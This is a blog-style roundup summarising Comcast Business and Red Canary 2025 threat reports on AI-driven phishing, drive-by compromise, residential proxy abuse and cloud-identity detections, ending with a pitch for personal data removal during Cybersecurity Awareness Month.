Comcast Business’s newly released Cybersecurity Threat Report offers one of the most comprehensive pictures yet of how enterprise threats evolved over the past year. Drawing from 34.6 billion cybersecurity events detected between June 2024 and May 2025, Comcast finds that attackers are accelerating in both volume and sophistication, weaponizing AI, exploiting human trust, and using stealthier techniques to evade traditional defenses.

The report identifies AI-driven phishing and social engineering as dominant early-stage threats, with 4.7 billion phishing attempts detected in one year, spanning email, text (smishing), voice (vishing), and even workplace chat tools. Generative AI is being used to craft realistic lures, clone voices, and create deepfake visuals, while overworked employees and security teams remain vulnerable to these convincingly tailored attacks.

“AI tools are only helping increase the realism, speed, and scale of phishing attempts, making this vector more formidable than ever.”

Another key finding is the surge in “drive-by compromise,” nearly 9.7 billion detected attempts, where visiting a compromised or malicious website automatically installs malware or exploit code. These silent infections can steal credentials, deploy infostealers, or open backdoors for later ransomware delivery. While not all drive-by attacks begin with phishing, the report notes that an increasing share are linked to phishing campaigns that funnel targets to these sites. For defenders, it underscores that the path from phishing email, text, or chat to endpoint compromise can now unfold in a single click.

The report also highlights an emerging threat called residential proxy (ResProxy) abuse, in which attackers hijack home and business devices like routers and IoT equipment to disguise malicious traffic. This tactic undermines IP-based trust and enables credential-stuffing and fraud attempts to appear as if they originate from legitimate users.

Comcast observed tens of thousands of “co-opted” consumer and business devices being used as residential proxies to disguise attacker traffic, likely compromised through a mix of vulnerability exploitation, credential-based takeovers, and some voluntary or socially engineered installations of proxy software.

Another prominent theme in the report is the human strain behind defense. With 67% of organizations facing cybersecurity staffing shortages, security teams are overwhelmed by false positives and repetitive alerts. Reducing the overall volume of attacks through preventive measures, like removing exposed personal data that feeds reconnaissance and social engineering, can help ease that pressure, cutting noise at the source so analysts can focus on true threats.

Comcast calls for multi-layered, adaptive security that combines prevention and detection, reinforces security culture, and aligns defenses with business risk. Its recommendations include stronger patch and vulnerability management, phishing-resistant MFA, posture management, AI-driven behavioral analytics, and proactive threat hunting supported by skilled analysts.

Read the full report here: 2025 Comcast Business Cybersecurity Threat Report | Comcast Business

Red Canary’s 2025 Threat Detection Report (Midyear Update)

Red Canary highlights a sharp rise in identity-related detections and increasingly deceptive phishing campaigns

Red Canary’s latest Threat Detection Report notes “an almost 500 percent increase in detections associated with T1078.004: Cloud Accounts in the first six months of 2025 compared to the entirety of 2024.”

Red Canary explains that these detections largely reflect suspicious or risky cloud logins rather than confirmed compromises. Many are benign or policy violations, such as employees signing into corporate accounts from personal devices or through unsanctioned VPNs. The surge, therefore, represents improved visibility into identity activity and increased risk detection, not necessarily a five-fold rise in intrusions.

For defenders, while identity visibility is improving, this visibility also exposes how intertwined personal and corporate digital identities have become. When legitimate employees frequently log in from unmanaged contexts, the security team sees lots of “unusual” events. 

Attackers may intentionally try to blend inside that noise. Once a personal device is compromised and its stored corporate credentials or browser cookies are stolen, an attacker can use them to access work systems from elsewhere, creating logins that blend in with other unusual, yet legitimate, activity.

Exposed personal data fuels this risk. When attackers know an employee’s name, phone number, or personal email, they can more easily compromise those personal accounts or devices first, then use the stolen credentials or session tokens to authenticate into the company’s environment as that employee.

Phishing findings

Red Canary examined “tens of thousands of user-reported phishing emails” from early 2025. Most reports turned out to be false alarms. Only 16% of the emails users flagged as suspicious were confirmed to be actual phishing attempts.

This means employees are showing vigilance, but are unable to reliably distinguish between legitimate and malicious messages. Of the confirmed phishing cases, 43% were credential phishing, 6% contained malicious attachments, and 51% were ‘generic social engineering.’

Red Canary investigators documented several novel and recurring phishing methods used in 2025:

• Google Translate masking: Attackers embedded malicious links inside translated webpages, producing legitimate-looking URLs ending in translate[.]goog to disguise the true domain.

• Vendor-account compromise: Phishing emails sent from actual compromised vendor accounts to partners or clients, appearing trustworthy because they come from legitimate domains with valid context.

• QR-code and SVG file smuggling: Use of JavaScript and SVG files to hide or assemble malicious payloads after download, bypassing traditional scanners.

• Paste-and-run / fake CAPTCHA lures: Webpages instructing users to paste PowerShell or cmd commands that install stealer malware or remote-access tools.

These lure-based campaigns demonstrate that phishing remains the primary delivery mechanism for a range of malicious activity.

The report’s findings highlight a need for organizations to cut down the noise that new identity visibility creates and to strengthen protections against targeted phishing attacks. 

To meet this challenge, organizations should:

1. Deploy phishing-resistant MFA and conditional access. Require strong authentication and restrict sign-ins from unmanaged or unknown devices.

2. Segregate work and personal identities. Enforce password-manager use, prohibit password reuse across personal and corporate accounts.

3. Reduce public exposure of employee PII. Remove personal data from data-broker sites to limit the information attackers can use to craft believable lures or compromise employee accounts.

Reducing the number of risky personal logins and targeted phishing attempts helps security teams spend less time chasing false positives and more time focusing on genuine threats.

Read the full report here: Threat Detection Report: 2025 Midyear Update | Red Canary

Cybersecurity Awareness Month 2025: Complete Your Defenses With Personal Data Removal

Breach shows that basic contact details remain a valuable data type for The Core 4 habits of Cybersecurity Awareness Month this year are essential, but must be supplemented with personal data removal

This year’s Cybersecurity Awareness Month highlights the ‘Core 4’ habits: strong passwords, MFA, scam awareness, and software updates. Put another way: protect your passwords, protect your accounts, protect against social engineering, and protect against exploitable vulnerabilities.

One of the most effective ways to reinforce the Core 4 is to address exposed personal data, because attackers rely on it to crack or harvest passwords, bypass MFA, and craft scams that AI now makes more scalable than ever. A data broker profile is an open vulnerability that is just as exploitable as unpatched software.

The less PII you leave exposed to attackers, the fewer opportunities they have, which means a dramatic reduction in targeted social engineering attempts that reach your email or phone. That’s a win for you, your company, and the overburdened security teams working to keep us all secure.

Follow the Core 4 habits to strengthen your passwords, accounts, awareness, and systems. But combine them with personal data removal for more complete proactive protection against today’s most common attack vectors.

Read our full article on this: Cybersecurity Awareness Month 2025: Complete Your Defenses With Personal Data Removal  – Optery